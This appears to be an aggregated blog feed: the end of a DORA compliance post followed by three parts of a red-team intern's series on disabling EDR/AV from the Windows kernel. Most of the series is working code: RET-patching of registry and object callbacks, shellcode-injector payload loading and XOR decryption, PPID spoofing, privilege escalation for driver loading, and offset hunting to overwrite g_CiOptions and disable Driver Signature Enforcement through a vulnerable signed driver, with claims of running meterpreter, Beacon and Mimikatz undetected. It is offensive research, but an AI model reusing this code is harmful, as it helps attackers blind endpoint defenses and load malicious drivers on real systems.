  • Define a procedure for the analysis of causes of disruptions
  • Define a procedure for the reporting to the management body
  • Develop ICT security awareness programs and trainings

Developing an ICT security awareness programs and trainings adds another level of complexity, as DORA does not only introduces compulsory training on digital operational resilience for the management body, DORA also introduces it for the whole staff, as part of their general training package. 


Financial entities shall define a communication strategy, plans and procedures for communicating ICT-related incidents to clients, counterparts and the public

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 13 Communication 
Clients and counterparts communication Entities shall have in place communication plans enabling a responsible disclosure of ICT-related incidents or major vulnerabilities to clients and counterparts as well as to the public, as appropriate. 
Staff communication Entities shall implement communication policies for staff and for external stakeholders.
(a) Communication policies for staff shall take into account the need to differentiate between staff involved in the ICT risk management, in particular response and recovery, and staff that needs to be informed. 
Mandate At least one person in the entity shall be tasked with implementing the communication strategy for ICT-related incidents and fulfil the role of public and media spokesperson for that purpose. 

What does this entail?

  • Develop communication plans to communicate to clients, counterparts and the public
  • Mandate at least one person to implement the communication strategy for ICT-related incidents

I hope you found this blogpost interesting.

Keep an eye out for the following parts! This blog post is part of a series. In the following blogposts, we will further explore the requirements associated with the Incident Management process, the Digital Operational Resilience Testing and the ICT Third-Party Risk Management of DORA.

About the Author

Nicolas is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into his technical hands-on experiences as well as his managerial academic background to help organisations build out their Cyber Security Strategy. He has a strong interest IT management, Digital Transformation, Information Security and Data Protection. In his personal life, he likes adventurous vacations. He hiked several 4000+ summits around the world, and secretly dreams about one day hiking all of the top summits. In his free time, he is an academic teacher who has been teaching for 7 years at both the Solvay Brussels School of Economics and Management and the Brussels School of Engineering. 

Find out more about Nicolas on Linkedin.

Kernel Karnage – Part 6 (Last Call)

By: bautersj
9 December 2021 at 13:04

With the release of this blogpost, we’re past the halfway point of my internship; time flies when you’re having fun.

1. Introduction – Status Report

In the course of these 6 weeks, I’ve covered several aspects of kernel drivers and EDR/AVs kernel mechanisms. I started off strong by examining kernel callbacks and why EDR/AV products use them extensively to gain vision into what’s happening on the system. I confirmed these concepts by leveraging existing work against $vendor1 and successfully executing Mimikatz on the compromised system.

Then I took a step back and did a deepdive in the inner structure and workings of a kernel driver, how it communicates with other drivers and applications and how I can intercept these communications using IRP MajorFunction hooks.

Once I had the basics sorted and got comfortable working with the kernel and a kernel debugger, I started developing my own driver called Interceptor, which has kernel callback patching and IRP MajorFunction hooking capabilities. I took the driver for a test drive against $vendor2 and concluded that attacking an EDR/AV product from kernel land alone is not sufficient and user land detection techniques should be taken into consideration as well.

To solve this problem, I then developed a custom shellcode injector using the EarlyBird technique, which combined with the Interceptor driver was able to partially bypass $vendor2 and launch a meterpreter session on the compromised system.

After this small success, I spent a good amount of time on code maintenance, refactoring, bug fixing and research, which has brought me to today’s blogpost. In this blogpost I would like to conclude the kernel callbacks, having solved my issues with registry and object callbacks, revisit the shellcode injector in a bit more detail and once more bring the fight to $vendor2. Let’s get to it, shall we?

2. Last call

Having covered process, thread and image callbacks in the previous blogposts, I think it’s only fair if we conclude this topic with registry and object callbacks. In the previous blogpost, I demonstrated how we can retrieve and enumerate the registry callback doubly linked list. The code to patch and subsequently restore these callbacks is almost identical, using the same iteration method. For the sake of simplicity, I decided to store the patched callbacks internally in an array of size 64, instead of another linked list.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; pEntry != (PLIST_ENTRY)callbackListHead; pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    auto callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
    PULONG64 pPointer = (PULONG64)callbackFuncAddr;

    switch (callback) {
      case registry:
        g_CallbackGlobals.RegistryCallbacks[index].patched = true;
        memcpy(g_CallbackGlobals.RegistryCallbacks[index].instruction, pPointer, 8);
        return STATUS_NOT_SUPPORTED;

    *pPointer = (ULONG64)0xC3;
    return STATUS_SUCCESS;

With the registry callbacks patched and taken care of, it’s time to jump the last hurdle, and it’s a big one: object callbacks. Out of all the kernel callbacks, object callbacks definitely gave me the most grief and I still don’t understand them 100%. There is only limited documentation out there and most of it covers object callbacks itself and how to use them, not how to bypass or disable them. Nonetheless, I found a couple good resources which I think are worth sharing:

2.1 What is this Object Callbacks black magic?

Object callbacks are called as a result of process / thread / desktop HANDLE operations. They can either be called before the operation takes place (POB_PRE_OPERATION_CALLBACK) or after the operation completes (POB_POST_OPERATION_CALLBACK). A good example is the OpenProcess() API call, which returns an open HANDLE to the target local process object if it succeeds. When OpenProcess() is called, a pre-operation callback can be triggered, and when OpenProcess() returns, a post-operation callback can be triggered.

Object callbacks only work on process objects, thread objects and desktop objects. The most common usecase for these object callbacks is to modify the requested access rights to said object. If I were to attach a debugger to an EDR/AV process by using OpenProcess() with the PROCESS_ALL_ACCESS flag, the EDR/AV would most likely use an object callback to change the granted access rights to something like PROCESS_QUERY_LIMITED_INFORMATION to protect itself.

2.2 Where can I find one for myself?

I’m glad you asked! Turns out they’re a little bit harder to locate. Windows contains a very important structure called OBJECT_TYPE which is defined as:

typedef struct _OBJECT_TYPE {
  LIST_ENTRY TypeList;
  PVOID DefaultObject; 
  UCHAR Index;
  ULONG TotalNumberOfObjects;
  ULONG TotalNumberOfHandles;
  ULONG HighWaterNumberOfObjects;
  ULONG HighWaterNumberOfHandles;
  OBJECT_TYPE_INITIALIZER TypeInfo; //unsigned char TypeInfo[0x78];
  EX_PUSH_LOCK TypeLock;
  ULONG Key;
  LIST_ENTRY CallbackList; //offset 0xC8

This structure is used to define the process and thread objects, which are the only two object types that allow callbacks on their creation and copying, and is stored in the global variables: **PsProcessType and **PsThreadType. It also contains a linked list entry LIST_ENTRY CallbackList, which points to a CALLBACK_ENTRY_ITEM structure defined as:

typedef struct _CALLBACK_ENTRY_ITEM {
	LIST_ENTRY EntryItemList;
	OB_OPERATION Operations;
	DWORD Active;
	POB_PRE_OPERATION_CALLBACK PreOperation; //offset 0x28
	POB_POST_OPERATION_CALLBACK PostOperation; //offset 0x30
	__int64 unk;

The POB_PRE_OPERATION_CALLBACK PreOperation and POB_POST_OPERATION_CALLBACK PostOperation members contain the function pointers to the registered callback routines.

2.3 Show me the code!

The above mentioned global variables **PsProcessType and **PsThreatType can be used to grab a POBJECT_TYPE struct, which contains the LIST_ENTRY CallbackList address at offset 0xC8.

PVOID* FindObRegisterCallbacksListHead(POBJECT_TYPE pObType) {
  //POBJECT_TYPE pObType = *PsProcessType;
	return (PVOID*)((__int64)pObType + 0xc8);

The CallbackList address can then be used to enumerate the linked list in a similar manner as the registry callback list and patch the pre- and post-operation callback function pointers. The pre- and post-operation callbacks are located at offsets 0x28 and 0x30 in the CALLBACK_ENTRY_ITEM structure.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)callbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    //grab pre-operation callback function address at offset 0x28
    auto preOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x28);
    if (MmIsAddressValid((PVOID*)preOpCallbackFuncAddr)) {

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)preOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][0].instruction, pPointer, 8);
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][0].instruction, pPointer, 8);
          return STATUS_NOT_SUPPORTED;

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;


      return STATUS_SUCCESS;

    //grab post-operation callback function address at offset 0x30
    auto postOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x30);
    if (MmIsAddressValid((PVOID*)postOpCallbackFuncAddr)) {

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)postOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][1].instruction, pPointer, 8);
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][1].instruction, pPointer, 8);
          return STATUS_NOT_SUPPORTED;

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;


      return STATUS_SUCCESS;
Interceptor patch object callback
patched process object callback

3. Interceptor vs $vendor2: Round 2

In my previous attempt to bypass $vendor2 and run a meterpreter reverse TCP shell on the compromised system, the attack was detected, but not blocked. My EarlyBird shellcode injector used a staged payload to connect back to the metasploit framework and fetch the meterpreter payload, which then got flagged by $vendor2.

To try and solve this issue, I decided not to use a staged payload, but instead embed the whole meterpreter payload in the binary itself. Since the payload size is around 200.000 bytes, it is impractical at best to embed it as a hexadecimal string and it would get immediately flagged when any static analysis is performed. Instead, one of my colleagues, Firat Acar, suggested I could embed the payload as an encrypted resource and load and decrypt it at runtime in memory.

The code for this is surprisingly simple:

HRSRC scResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD1), L"payload");
DWORD scSize = SizeofResource(NULL, scResource);
HGLOBAL scResourceData = LoadResource(NULL, scResource);

Once the resource is loaded, a function like memcpy() or NtWriteVirtualMemory() can be used to write it to memory. Once that’s done, it can be decrypted in memory using a simple XOR:

void XORDecryptInMemory(const char* key, int keyLen, int dataLen, LPVOID startAddr) {
	BYTE* t = (BYTE*)startAddr;

	for (DWORD i = 0; i < dataLen; i++) {
		t[i] ^= key[i % keyLen];

Since my shellcode injector attempts to inject into a remote process, using this decrypt routine will cause a STATUS_ACCESS_VIOLATION exception, since directly accessing memory of a different process is not allowed. Instead functions like NtReadVirtualMemory() and NtWriteVirtualMemory() should be used.

However, after testing this approach against $vendor2, the embedded resource got flagged almost immediately. Maybe a better encryption algorithm like RC4 or AES could work, but that also comes with a lot of overhead to implement.

A different solution to this problem might be to fetch the payload remotely using sockets, in an attempt to avoid using higher level APIs like WinINet. For now I reverted back to a staged payload embedded as a hexadecimal string.

With the ability to now patch all the kernel callbacks, I decided to try and bypass $vendor2 once more. I disabled its botnet protection module, which inspects network traffic for potential malicious activity, since this is what flagged the meterpreter traffic in the first place. I wanted to see if apart from network packet inspection, $vendor2 would detect the meterpreter payload. However, after testing with an HTTPS implant, the botnet protection did not detect and block the payload.

4. Conclusion

This blogpost concludes patching the kernel callbacks. While there is more functionality to add and more problems to address from kernel space, such as ETW or minifilters, the main goal of sufficiently crippling an EDR/AV product using a kernel driver has been met. Using Interceptor, we can deploy a meterpreter shell or Cobalt Strike Beacon and even run Mimikatz undetected. The next challenge will be to deploy the driver on a target and bypass protections such as Driver Signature Enforcement.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 7 (Out of the Lab and Back to Reality)

By: bautersj
20 December 2021 at 13:49

This week I emerge from the lab and put on a different hat.

1. Switching hats

With Interceptor being successful in blinding $vendor2 sufficiently to run a meterpreter reverse shell, it is time to put on the red team hat and get out of the perfect lab environment. To do just that, I had to revert some settings I turned off at the beginning of this series.

First, I enabled Secure Boot and disabled test signing mode on the target VM. Secure Boot will enable Microsoft’s Driver Signature Enforcement (DSE) policy, which blocks non-WHQL-signed drivers from being loaded, which includes my Interceptor driver. It’s important to note I left HyperGuard (HVCI) turned off, because I currently have no way of defeating Virtualization-based protection.

With the target configured, I then set up a Cobalt Strike Teamserver using a Gmail Malleable C2 profile and configured my EarlyBird shellcode injector to deliver an HTTPS Beacon. My idea was to simulate a scenario where an attacker (me) had managed to gain a foothold on the target and obtained an implant with elevated privileges. The attacker would then use the implant to disable DSE on the compromised system and load the Interceptor driver, all directly in memory to keep a low footprint. Once Interceptor has been loaded on the target system, it would cripple the EDR/AV product and allow the attacker to run Mimikatz undetected.

Naturally, nothing ever goes as planned.

2. Outspoofing myself

The first issue I ran into was executing my shellcode injector with elevated privileges. No matter what I tried, I couldn’t seem to get a Beacon callback with elevated privileges, so I took my issue to infosec Twitter and unmasked the culprit with the help of @trickster012.

The code that is responsible for spawning a new spoofed process which is then used to inject the Beacon payload into looks like this:

    //do dynamic imports
    hK32 = GetModuleHandleA("kernel32");
    FARPROC fpInitializeProcThreadAttributeList = GetProcAddress(hK32, "InitializeProcThreadAttributeList");
    _InitializeProcThreadAttributeList InitializeProcThreadAttributeList = (_InitializeProcThreadAttributeList)fpInitializeProcThreadAttributeList;
    FARPROC fpUpdateProcThreadAttribute = GetProcAddress(hK32, "UpdateProcThreadAttribute");
    _UpdateProcThreadAttribute UpdateProcThreadAttribute = (_UpdateProcThreadAttribute)fpUpdateProcThreadAttribute;
    FARPROC fpDeleteProcThreadAttributeList = GetProcAddress(hK32, "DeleteProcThreadAttributeList");
    _DeleteProcThreadAttributeList DeleteProcThreadAttributeList = (_DeleteProcThreadAttributeList)fpDeleteProcThreadAttributeList;

    SIZE_T attributeSize;

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    InitializeProcThreadAttributeList(NULL, 2, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &attributeSize);

    //enable CIG
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);
    //PPID spoof: set parentHandle as parent process
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentHandle, sizeof(HANDLE), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

        throw "";

    std::cout << "Process created!" << " PID: " << pi.dwProcessId << "\n";


    return pi;

The Spawn() function takes a parameter HANDLE parentHandle, which is used to set the parent process of the newly created process. The handle would in this case point to explorer.exe as this is the process I was spoofing. @CaptMeelo recently posted a great blogpost titled Picky PPID Spoofing which covers the topic of PPID spoofing quite well.

To make a long story short, as stated in the Microsoft documentation, the to-be-created process inherits certain attributes from its parent process (the one we’re spoofing), this also happens to include the process token. One of the many things contained in a token are the privileges held by the user or the user’s group that are associated with the process.

Parent process attributes

If we take a look at explorer.exe in Process Hacker we can see the associated user and token. We can also see that the process is not running in elevated context. Taking into consideration the attribute inheritance, it makes sense that I couldn’t manage to spawn an elevated process with explorer.exe set as parent.

Explorer.exe process hacker

With this issue identified and remediated, I ran head first into the next one: concealing Beacon from EDR/AV. My shellcode injector is still configured to use embedded shellcode, instead of pulling a payload from somewhere else. So far this has worked quite well, using stageless payloads. I replaced the meterpreter payload with one of Cobalt Strike’s stagers, which would then pull a full HTTPS Beacon payload. I have not (yet) modified Beacon, so once the stager pulls the payload, EDR/AV detects a Cobalt Strike artifact in memory and takes action. Uh oh, not good. As of writing this blogpost, I have not yet figured out the answer to this problem, if there are any reader suggestions, you’re more than welcome to share them with me on Twitter.

3. Disabling Driver Signature Enforcement (DSE)

Instead, I decided to move on to the task at hand: disabling driver signature enforcement (DSE) on the target and loading Interceptor. Over the course of my research I stumbled across Kernel Driver Utility (KDU), a tool developed by @hfiref0x. One of the many wonderous things this tool can do is disable Driver Signature Enforcement (DSE). It does this by loading a WHQL-signed driver with an arbitrary kernel memory read/write vulnerability to change the state of ntoskrnl.exe g_CiEnabled or CI.dll g_CiOptions, depending on the build version of Windows.

I tested KDU and it worked well, except it didn’t tick all the boxes required for the scenario:

  1. It got flagged by EDR/AV
  2. It cannot be executed in memory from a Beacon

What I need is a custom Beacon Object File (BOF) whose only purpose is to disable DSE and load Interceptor, or any other malicious driver for that matter. Windows provides APIs like NtLoadDriver() and NtUnloadDriver() to handle loading drivers programmatically; there’s just one catch: drivers cannot be loaded from memory, they need to touch disk, which is not good for OPSEC. To be fair, this statement is not 100% correct though, because there are ways to manually map drivers into memory, however they come with a lot of drawbacks like:

  • Invalid DeviceObject and RegistryPath objects
  • No Structured Exception Handling (SEH)
  • Cannot be unloaded, so they persist until reboot
  • Only ntoskrnl.exe imports are resolved
  • Cannot use certain kernel primitives like callbacks because of PatchGuard

I won’t go into much details here, but manually mapping comes with so much overhead and instability it is out of the equation (until I get bored). So instead, I’ll have to sacrifice some OPSEC and touch disk for a safer and more stable result. I’m currently developing a BOF to disable DSE using CVE-2015-2291 which will also be integrated in my CobaltWhispers framework for Cobalt Strike, which I just updated to use SysWhispers2 and InlineWhispers2 to dynamically resolve direct syscalls.

Disable DSE

4. Conclusion

With the release of this blogpost, the kernel driver Interceptor is nearly complete in functionality and is able to fullfill its purpose. Writing tools wouldn’t be very useful if they don’t work outside of a lab environment and not all of us have magical access to code signing certificates and administrator privileges in a target environment. I spent a good amount of time uncovering new and different hurdles that come with the scenario I presented, and subsequently tried to find solutions to them. I guess it goes to show, most challenges to remain undetected and bypass EDR/AV are still presented in user space and have to be addressed as such.

Besides the challenges in user space, there are still several kernel space aspects I want to look at in upcoming blogposts if the time permits. These include:

  • disabling Sysmon and Event Tracing for Windows (ETW)
  • hooking minifilters
  • inspecting and filtering IRPs

But as with everything, time flies by when one’s having fun 😉

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 8 (Getting Around DSE)

By: bautersj
10 January 2022 at 08:00

When life gives you exploits, you turn them into Beacon Object Files.

1. Back to BOFs

I never thought I would say this, but after spending so much time in kernel land, it’s almost as if developing kernel functionality is easier than writing user land applications, especially when they need to fly under the radar. As I mentioned in my previous blogpost, I am in dire need of a Beacon Object File to disable Driver Signature Enforcement (DSE) from memory. However, writing a BOF with such complex functionality results in a lot of code and is hard to test and debug, especially when also using direct syscalls. So I decided to first write a regular C/C++ console application which should do exactly the same, except for the intergration part with CobaltWhispers which takes care of the payload.

2. May I load drivers, please?

The first task at hand is making sure the current process context we’re in has sufficient privileges to load or unload a driver. By default, even in elevated context, the required privilege SeLoadDriverPrivilege is disabled.

SeLoadDriverPrivilege disabled

Luckily, changing the privileges isn’t too difficult. At boot time, each privilege is assigned a locally unique identifier LUID. Using the LookupPrivilegeValue() function, the LUID associated with SeLoadDriverPrivilege can be retrieved and passed to NtAdjustPrivilegesToken() together with the SE_PRIVILEGE_ENABLED flag.

LUID luid;
HANDLE hToken;

status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);

LookupPrivilegeValue(nullptr, L"SeLoadDriverPrivilege", &luid)

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

NtAdjustPrivilegesToken(hToken, FALSE, &tp, 0, nullptr, 0);
SeLoadDriverPrivilege enabled

3. Down to business

Once the privileges are sorted, we can move on to the next step, which is creating the necessary registry key and its values. When a driver is loaded using the NtLoadDriver() API, a registry key is passed as parameter. This registry key is necessary because it contains the location of the driver on disk (this is why we need to touch disk to load a driver), as well as a couple of other values indicating the type of driver, the error handling when the driver fails to start and when in the boot sequence the driver should be started.

Creating registry keys is nothing new:

ULONG disposition;
RtlInitUnicodeString(&keyName, KeyName);

InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

NtCreateKey(&hKey, KEY_ALL_ACCESS, &oa, 0, nullptr, REG_OPTION_NON_VOLATILE, &disposition);

RtlInitUnicodeString(&keyValueName, L"ErrorControl");
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Type");
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"Start");
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"ImagePath");
RtlInitUnicodeString(&DriverImagePath, DriverPath);
NtSetValueKey(hKey, &keyValueName, 0, REG_EXPAND_SZ, (BYTE*)DriverImagePath.Buffer, DriverImagePath.Length + sizeof(UNICODE_NULL));

The registry key has been successfully created and the ImagePath value points to the driver on disk.

Driver registry entrance

The registry key can then be passed to NtLoadDriver(), which will read the driver from disk and load it into memory. Once the driver is no longer needed, it can be unloaded by passing the same registry key to NtUnloadDriver(). For OPSEC considerations, once the driver is unloaded from the system, the registry key and binary on disk should also be removed, which is relatively easy with calls to NtOpenKeyEx(), NtDeleteKey() and NtDeleteFile().

//do stuff

InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtOpenKeyEx(&hKey, DELETE, &oa, 0);

InitializeObjectAttributes(&oa, &DriverImagePath, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

4. A touch of black magic and a sprinkle of luck

Now that I’m able to load and unload a signed driver, it’s time to figure out how to tackle DSE.

Driver Signature Enforcement is part of Windows Code Integrity (CI) and, depending on the Windows build version, it is located in ntoskrnl.exe or CI.dll as a global non-exported variable (flag). Before Windows 8 build 9600, the DSE flag is located in ntoskrnl.exe as nt!g_CiEnabled, which is a global boolean variable toggling DSE either enabled or disabled. In any other more recent builds, the DSE flag can be found in CI.dll as CI!g_CiOptions, which is a combination of flags (0x0=disabled, 0x6=enabled, 0x8=test mode).

For a more detailed write-up or insight into DSE I recommend A quick insight into Driver Signature Enforcement by @j00ru, Capcom Rootkit Proof-Of-Concept by @FuzzySec and Loading unsigned Windows drivers without reboot by @vikingfr.

In a nutshell, the idea is to (ab)use a vulnerable signed driver with an arbitrary kernel memory read/write exploit, locate either the g_CiEnabled or g_CiOptions variables in kernel memory and overwrite the value with 0x0 to disable DSE using the vulnerable driver. Once DSE is disabled, the malicious driver can be loaded, after which the DSE value should be restored as soon as possible, because DSE is protected by PatchGuard. Sounds relatively straightforward you might say, however the hard part is locating g_CiEnabled or g_CiOptions, because even though we know where to go looking, they are not exported so we will need to perform offset calculations.

Since in theory any vulnerable driver with the ability to read/write kernel memory can be used, I won’t be covering the specifics of my vulnerable driver. I relied heavily on KDU’s source code for the implementation of locating g_CiEnabled / g_CiOptions. A lot of code is copied directly from KDU and slightly modified to adjust for a single vulnerable driver, use lower level API calls, or direct syscalls and be overall more readable.

Starting from the top, I have a function ControlDSE() responsible for toggling the DSE value. This function calls QueryVariable() which returns the address in memory of the DSE variable and then calls the vulnerable driver via the DriverReadVirtualMemory() and DriverWriteVirtualMemory() functions to control the DSE value.

NTSTATUS ControlDSE(HANDLE DeviceHandle, ULONG buildNumber, ULONG DSEValue) {
	ULONG_PTR variableAddress;
	ULONG flags = 0;

    // locate the address in memory of the DSE variable
	variableAddress = QueryVariable(buildNumber);

    DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
    if (DSEValue == flags) // current DSE value equals the DSE value we want to set
        return STATUS_SUCCESS;

    status = DriverWriteVirtualMemory(DeviceHandle, variableAddress, &DSEValue, sizeof(DSEValue));
    if (NT_SUCCESS(status)) {
        // confirm the new DSE value is written to memory
        flags = 0;

        DriverReadVirtualMemory(DeviceHandle, variableAddress, &flags, sizeof(flags));
        if (flags == DSEValue)
            printf("New DSE value set\n");
            printf("Failed to set new DSE value\n");
	return status;

To locate the address of the DSE variable in memory, QueryVariable() first retrieves the base address of the loaded module in kernel space. Under the hood, GetModuleBaseByName() uses NtQuerySystemInformation() with the SystemModuleInformation information class to retrieve a list of loaded modules and then performs a basic string comparison until it has found the module it’s looking for. Next, QueryVariable() maps a copy of the module into its own virtual memory, which is later used to calculate offsets, and calls QueryCiEnabled() or QueryCiOptions() respectively depending on the build number.

ULONG_PTR QueryVariable(ULONG buildNumber) {
	NTSTATUS status;
	ULONG loadedImageSize = 0;
	SIZE_T sizeOfImage = 0;
	ULONG_PTR result = 0, imageLoadedBase, kernelAddress = 0;
	const char* moduleNameA = nullptr;
    PCWSTR moduleNameW = nullptr;
	HMODULE mappedImageBase;

	WCHAR szFullModuleName[MAX_PATH * 2];

	if (buildNumber < 9600) { // WIN8
		moduleNameA = "ntoskrnl.exe";
        moduleNameW = L"ntoskrnl.exe";
	else {
		moduleNameA = "CI.dll";
        moduleNameW = L"CI.dll";

    // get the base address of the module loaded in kernel space
	imageLoadedBase = GetModuleBaseByName(moduleNameA, &loadedImageSize);
	if (imageLoadedBase == 0)
		return 0;

	szFullModuleName[0] = 0;
	if (!GetSystemDirectory(szFullModuleName, MAX_PATH))
		return 0;

	wcscat_s(szFullModuleName, MAX_PATH * 2, L"\\");
	wcscat_s(szFullModuleName, MAX_PATH * 2, moduleNameW);

    // map a local copy of the module
	mappedImageBase = LoadLibraryEx(szFullModuleName, nullptr, DONT_RESOLVE_DLL_REFERENCES);

    if (buildNumber < 9600) {
        status = QueryImageSize(mappedImageBase, &sizeOfImage);

        if (NT_SUCCESS(status)) {
            // calculate offsets and find g_CiEnabled address
            status = QueryCiEnabled(mappedImageBase, imageLoadedBase, &kernelAddress, sizeOfImage);
    else {
        // calculate offsets and find g_CiOptions address
        status = QueryCiOptions(mappedImageBase, imageLoadedBase, &kernelAddress, buildNumber);

    if (NT_SUCCESS(status)) {
        // verify if the found address is in a valid memory range associated with the loaded module in kernel space
        if (IN_REGION(kernelAddress, imageLoadedBase, loadedImageSize))
            result = kernelAddress;

	return result;

The QueryCiEnabled() and QueryCiOptions() functions perform the actual black magic of calculating the right offsets using the kernel module and local mapped copy. QueryCiOptions() makes use of the Hacker Disassembler Engine 64 (modified to be a single C/C++ Header file) to inspect the assembly instructions and calculate the right offset. Once the local offset has been calculated and stored in the ptrCode variable, the actual address is calculated by adding the local offset to the kernel module base address and substracting the base address of the locally mapped copy.

NTSTATUS QueryCiOptions(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, ULONG buildNumber) {
	PBYTE ptrCode = nullptr;
	ULONG offset, k, expectedLength;
	LONG relativeValue = 0;
	ULONG_PTR resolvedAddress = 0;

	hde64s hs;

	*ResolvedAddress = 0ULL;

	ptrCode = (PBYTE)GetProcAddress(ImageMappedBase, (PCHAR)"CiInitialize");
	if (ptrCode == nullptr)

	RtlSecureZeroMemory(&hs, sizeof(hs));
	offset = 0;

	if (buildNumber < 16299) {
		expectedLength = 5;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)

            if (hs.len == expectedLength) { //test if jmp
                // jmp CipInitialize
                if (ptrCode[offset] == 0xE9) {
                    relativeValue = *(PLONG)(ptrCode + offset + 1);
            offset += hs.len;
        } while (offset < 256);
	else {
		expectedLength = 3;

		do {
            hde64_disasm(&ptrCode[offset], &hs);
            if (hs.flags & F_ERROR)

            if (hs.len == expectedLength) {
                // Parameters for the CipInitialize.
                k = CheckInstructionBlock(ptrCode,

                if (k != 0) {
                    expectedLength = 5;
                    hde64_disasm(&ptrCode[k], &hs);
                    if (hs.flags & F_ERROR)
                    // call CipInitialize
                    if (hs.len == expectedLength) {
                        if (ptrCode[k] == 0xE8) {
                            offset = k;
                            relativeValue = *(PLONG)(ptrCode + k + 1);
            offset += hs.len;
        } while (offset < 256);

	if (relativeValue == 0)

	ptrCode = ptrCode + offset + hs.len + relativeValue;
	relativeValue = 0;
	offset = 0;
	expectedLength = 6;

	do {
        hde64_disasm(&ptrCode[offset], &hs);
        if (hs.flags & F_ERROR)

        if (hs.len == expectedLength) { //test if mov
            if (*(PUSHORT)(ptrCode + offset) == 0x0d89) {
                relativeValue = *(PLONG)(ptrCode + offset + 2);
        offset += hs.len;
    } while (offset < 256);

	if (relativeValue == 0)

	ptrCode = ptrCode + offset + hs.len + relativeValue;
    // calculate the actual address in kernel space
    // by adding the offset and substracting the base address
    // of the locally mapped copy from the kernel module base address
	resolvedAddress = ImageLoadedBase + ptrCode - (PBYTE)ImageMappedBase;

	*ResolvedAddress = resolvedAddress;

QueryCiEnabled() uses a hardcoded value of 0x1D8806EB to calculate and resolve the offset.

NTSTATUS QueryCiEnabled(HMODULE ImageMappedBase, ULONG_PTR ImageLoadedBase, ULONG_PTR* ResolvedAddress, SIZE_T SizeOfImage) {
	SIZE_T c;
	LONG rel = 0;

	*ResolvedAddress = 0;

	for (c = 0; c < SizeOfImage - sizeof(DWORD); c++) {
		if (*(PDWORD)((PBYTE)ImageMappedBase + c) == 0x1d8806eb) {
			rel = *(PLONG)((PBYTE)ImageMappedBase + c + 4);
			*ResolvedAddress = ImageLoadedBase + c + 8 + rel;
			status = STATUS_SUCCESS;
	return status;

5. Conclusion

Programmatically loading drivers has its challenges, but it goes to show if you’re willing to mess around in memory a bit, Windows security components can be bypassed with relative ease. A lot of existing research and exploits are already out there and Microsoft has put in little effort to mitigate them or update existing functionality like Code Integrity to be better protected against attacks. Even if additional patches have fixed certain issues, chaining different exploits together still gets the job done.

